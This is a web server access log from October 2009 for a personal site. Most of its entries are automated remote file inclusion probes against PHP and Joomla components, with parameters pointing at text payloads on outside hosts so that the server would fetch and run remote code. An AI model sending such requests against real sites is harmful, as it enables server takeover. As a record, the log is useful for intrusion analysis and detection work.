82.193.15.3 - - [30/Oct/2009:10:00:33 -0700] "GET /logs/access_090807.log/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.193.15.3 - - [30/Oct/2009:10:00:38 -0700] "GET /logs/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.230.118.81 - - [30/Oct/2009:10:00:54 -0700] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://poohh.fileave.com/aa.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.230.118.81 - - [30/Oct/2009:10:00:54 -0700] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://poohh.fileave.com/aa.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.230.118.81 - - [30/Oct/2009:10:00:54 -0700] "GET /logs/access_080612.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://poohh.fileave.com/aa.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.230.118.81 - - [30/Oct/2009:10:01:02 -0700] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://poohh.fileave.com/aa.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.230.118.81 - - [30/Oct/2009:10:01:02 -0700] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://poohh.fileave.com/aa.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.230.118.81 - - [30/Oct/2009:10:01:02 -0700] "GET /logs/access_080612.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://poohh.fileave.com/aa.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.195.124.11 - - [30/Oct/2009:10:01:10 -0700] "GET /logs/access_090408.log%20%20////administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.195.124.11 - - [30/Oct/2009:10:01:16 -0700] "GET /logs/access_090408.log%20%20////administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.108.177.238 - - [30/Oct/2009:10:01:39 -0700] "GET /?_zb_path=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 200 16041 "-" "Mozilla/5.0" "www.dmulk.com"
114.108.177.238 - - [30/Oct/2009:10:01:39 -0700] "GET /logs/access_081001.log/?_zb_path=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.108.177.238 - - [30/Oct/2009:10:01:40 -0700] "GET /logs/?_zb_path=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 200 123783 "-" "Mozilla/5.0" "www.dmulk.com"
58.230.118.81 - - [30/Oct/2009:10:01:42 -0700] "GET /logs/access_080314.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://poohh.fileave.com/aa.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.195.124.11 - - [30/Oct/2009:10:01:42 -0700] "GET /logs/access_090708.log%20%20////administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.108.177.238 - - [30/Oct/2009:10:01:43 -0700] "GET /?_zb_path=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.0" 200 16025 "-" "Mozilla/5.0" "www.dmulk.com"
114.108.177.238 - - [30/Oct/2009:10:01:43 -0700] "GET /logs/access_081001.log/?_zb_path=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.108.177.238 - - [30/Oct/2009:10:01:44 -0700] "GET /logs/?_zb_path=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 200 123783 "-" "Mozilla/5.0" "www.dmulk.com"
114.108.177.238 - - [30/Oct/2009:10:01:44 -0700] "GET /logs/?_zb_path=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 200 123783 "-" "Mozilla/5.0" "www.dmulk.com"
114.108.177.238 - - [30/Oct/2009:10:01:45 -0700] "GET /?_zb_path=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 200 16041 "-" "Mozilla/5.0" "www.dmulk.com"
114.108.177.238 - - [30/Oct/2009:10:01:45 -0700] "GET /logs/access_081001.log/?_zb_path=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.195.124.11 - - [30/Oct/2009:10:01:56 -0700] "GET /logs/access_090708.log%20%20////administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.230.118.81 - - [30/Oct/2009:10:02:03 -0700] "GET /logs/access_080314.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://poohh.fileave.com/aa.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.193.15.3 - - [30/Oct/2009:10:02:06 -0700] "GET /logs/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.193.15.3 - - [30/Oct/2009:10:02:06 -0700] "GET /webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.193.15.3 - - [30/Oct/2009:10:02:06 -0700] "GET /logs/access_090807.log/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.193.15.3 - - [30/Oct/2009:10:02:16 -0700] "GET /logs/access_090821.log/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.103.72.130 - - [30/Oct/2009:10:02:29 -0700] "GET /SQuery/lib/gore.php?libpath=http://azar.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.103.72.130 - - [30/Oct/2009:10:02:29 -0700] "GET /logs/SQuery/lib/gore.php?libpath=http://azar.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.103.72.130 - - [30/Oct/2009:10:02:29 -0700] "GET /logs/access_080305.log%20%20/SQuery/lib/gore.php?libpath=http://azar.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.103.72.130 - - [30/Oct/2009:10:02:40 -0700] "GET /logs/access_090515.log%20%20/SQuery/lib/gore.php?libpath=http://azar.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [30/Oct/2009:10:03:32 -0700] "GET /logs/access_090115.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [30/Oct/2009:10:03:33 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 200 123790 "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [30/Oct/2009:10:03:33 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 200 16076 "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [30/Oct/2009:10:03:34 -0700] "GET /logs/access_090115.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [30/Oct/2009:10:03:34 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 200 123790 "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [30/Oct/2009:10:03:35 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 200 16075 "-" "Mozilla/5.0" "www.dmulk.com"
114.108.177.238 - - [30/Oct/2009:10:03:44 -0700] "GET /logs/access_090215.log/?_zb_path=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.108.177.238 - - [30/Oct/2009:10:03:49 -0700] "GET /logs/access_090215.log/?_zb_path=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.108.177.238 - - [30/Oct/2009:10:03:59 -0700] "GET /logs/access_090215.log/?_zb_path=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [30/Oct/2009:10:04:17 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 200 16075 "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [30/Oct/2009:10:04:23 -0700] "GET /logs/access_090115.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [30/Oct/2009:10:04:24 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 200 123790 "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [30/Oct/2009:10:04:40 -0700] "GET /logs/access.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "dmulk.com"
94.236.23.242 - - [30/Oct/2009:10:04:40 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 200 123790 "-" "Mozilla/5.0" "dmulk.com"
64.157.4.43 - - [30/Oct/2009:10:04:41 -0700] "POST /blog/wp-cron.php?doing_wp_cron HTTP/1.0" 200 1 "-" "WordPress/2.8.5; http://dmulk.com/blog" "dmulk.com"
94.236.23.242 - - [30/Oct/2009:10:04:41 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 200 16076 "-" "Mozilla/5.0" "dmulk.com"
94.236.23.242 - - [30/Oct/2009:10:04:42 -0700] "GET /logs/access.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "dmulk.com"
94.236.23.242 - - [30/Oct/2009:10:04:42 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 200 16075 "-" "Mozilla/5.0" "dmulk.com"
94.236.23.242 - - [30/Oct/2009:10:04:42 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 200 123790 "-" "Mozilla/5.0" "dmulk.com"
83.103.72.130 - - [30/Oct/2009:10:04:51 -0700] "GET /SQuery/lib/gore.php?libpath=http://azar.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.103.72.130 - - [30/Oct/2009:10:04:51 -0700] "GET /logs/SQuery/lib/gore.php?libpath=http://azar.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.103.72.130 - - [30/Oct/2009:10:04:51 -0700] "GET /logs/access_090515.log/SQuery/lib/gore.php?libpath=http://azar.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.115.254 - - [30/Oct/2009:10:05:18 -0700] "GET /bikes/dteel/2008_02_23/?S=A HTTP/1.0" 200 1540 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
94.236.23.242 - - [30/Oct/2009:10:05:24 -0700] "GET /logs/access.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "dmulk.com"
94.236.23.242 - - [30/Oct/2009:10:05:24 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 200 16075 "-" "Mozilla/5.0" "dmulk.com"
94.236.23.242 - - [30/Oct/2009:10:05:24 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 200 123790 "-" "Mozilla/5.0" "dmulk.com"
67.195.115.254 - - [30/Oct/2009:10:05:42 -0700] "GET /logs/access_071228.log HTTP/1.0" 200 398582 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:10:05:50 -0700] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:10:05:50 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:10:05:50 -0700] "GET /logs/access_080416.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
68.125.217.120 - - [30/Oct/2009:10:05:50 -0700] "GET /bikes/2k6klr650/klr004.JPG HTTP/1.1" 200 216057 "http://www.st-owners.com/forums/showthread.php?t=72916" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)" "www.dmulk.com"
68.125.217.120 - - [30/Oct/2009:10:05:50 -0700] "GET /bikes/2k6klr650/klr005.JPG HTTP/1.1" 200 98538 "http://www.st-owners.com/forums/showthread.php?t=72916" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)" "www.dmulk.com"
68.125.217.120 - - [30/Oct/2009:10:05:50 -0700] "GET /bikes/2k6klr650/klr006.JPG HTTP/1.1" 200 109371 "http://www.st-owners.com/forums/showthread.php?t=72916" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)" "www.dmulk.com"
68.125.217.120 - - [30/Oct/2009:10:05:50 -0700] "GET /bikes/2k6klr650/klr002.JPG HTTP/1.1" 200 287373 "http://www.st-owners.com/forums/showthread.php?t=72916" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)" "www.dmulk.com"
68.125.217.120 - - [30/Oct/2009:10:05:50 -0700] "GET /bikes/2k6klr650/klr003.JPG HTTP/1.1" 200 299517 "http://www.st-owners.com/forums/showthread.php?t=72916" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)" "www.dmulk.com"
68.125.217.120 - - [30/Oct/2009:10:05:53 -0700] "GET /bikes/2k6klr650/klr001a.JPG HTTP/1.1" 200 325181 "http://www.st-owners.com/forums/showthread.php?t=72916" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:10:06:00 -0700] "GET /logs/access_080218.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:10:06:10 -0700] "GET /logs/access_080416.log%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:10:06:10 -0700] "GET /logs/access_080218.log%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.103.72.130 - - [30/Oct/2009:10:06:30 -0700] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://azar.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.103.72.130 - - [30/Oct/2009:10:06:31 -0700] "GET /logs/access_090627.log/components/com_forum/download.php?phpbb_root_path=http://azar.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.103.72.130 - - [30/Oct/2009:10:06:31 -0700] "GET /components/com_forum/download.php?phpbb_root_path=http://azar.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.103.72.130 - - [30/Oct/2009:10:06:39 -0700] "GET /logs/access_080502.log/components/com_forum/download.php?phpbb_root_path=http://azar.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.115.254 - - [30/Oct/2009:10:07:14 -0700] "GET /logs/access_090505.log HTTP/1.0" 200 3790108 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
68.125.217.120 - - [30/Oct/2009:10:07:15 -0700] "GET /bikes/2k6klr650/klr006.JPG HTTP/1.1" 200 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)" "www.dmulk.com"
68.125.217.120 - - [30/Oct/2009:10:07:16 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)" "www.dmulk.com"
83.103.72.130 - - [30/Oct/2009:10:07:26 -0700] "GET /logs/access_080808.log/SQuery/lib/gore.php?libpath=http://azar.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.232.167.73 - - [30/Oct/2009:10:07:45 -0700] "GET /logs/access_080531.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.shchd.co.kr/icon/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.232.167.73 - - [30/Oct/2009:10:07:45 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.shchd.co.kr/icon/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.232.167.73 - - [30/Oct/2009:10:07:45 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.shchd.co.kr/icon/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.232.167.73 - - [30/Oct/2009:10:09:22 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.shchd.co.kr/icon/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.232.167.73 - - [30/Oct/2009:10:09:22 -0700] "GET /logs/access_080531.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.shchd.co.kr/icon/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.232.167.73 - - [30/Oct/2009:10:09:22 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.shchd.co.kr/icon/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.115.254 - - [30/Oct/2009:10:10:05 -0700] "GET /bikes/2009-04-14/?N=D HTTP/1.0" 200 1246 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:10:10:16 -0700] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:10:10:16 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:10:10:16 -0700] "GET /logs/access_080602.log%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:10:10:21 -0700] "GET /logs/access_080422.log%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:10:10:27 -0700] "GET /admin/business_inc/saveserver.php?thisdir=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:10:10:27 -0700] "GET /logs/access_080509.log%20%20//admin/business_inc/saveserver.php?thisdir=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:10:10:27 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:10:10:36 -0700] "GET /logs/access_080508.log%20%20//admin/business_inc/saveserver.php?thisdir=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.103.72.130 - - [30/Oct/2009:10:11:36 -0700] "GET /logs/access_080515.log%20%20/components/com_forum/download.php?phpbb_root_path=http://azar.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.103.72.130 - - [30/Oct/2009:10:11:36 -0700] "GET /logs/access_080816.log%20%20/components/com_forum/download.php?phpbb_root_path=http://azar.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:10:11:47 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:10:11:47 -0700] "GET /logs/access_071016.log%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:10:11:47 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:10:11:49 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:10:11:49 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:10:11:49 -0700] "GET /logs/access_071016.log%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:10:11:49 -0700] "GET /logs/access_071028.log%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:10:11:56 -0700] "GET /logs/access_071028.log%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:12:04 -0700] "GET /logs/access_080928.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:12:04 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:12:04 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:12:04 -0700] "GET /logs/access_080928.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:12:04 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:12:04 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:12:06 -0700] "GET /logs/access_080928.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:12:06 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
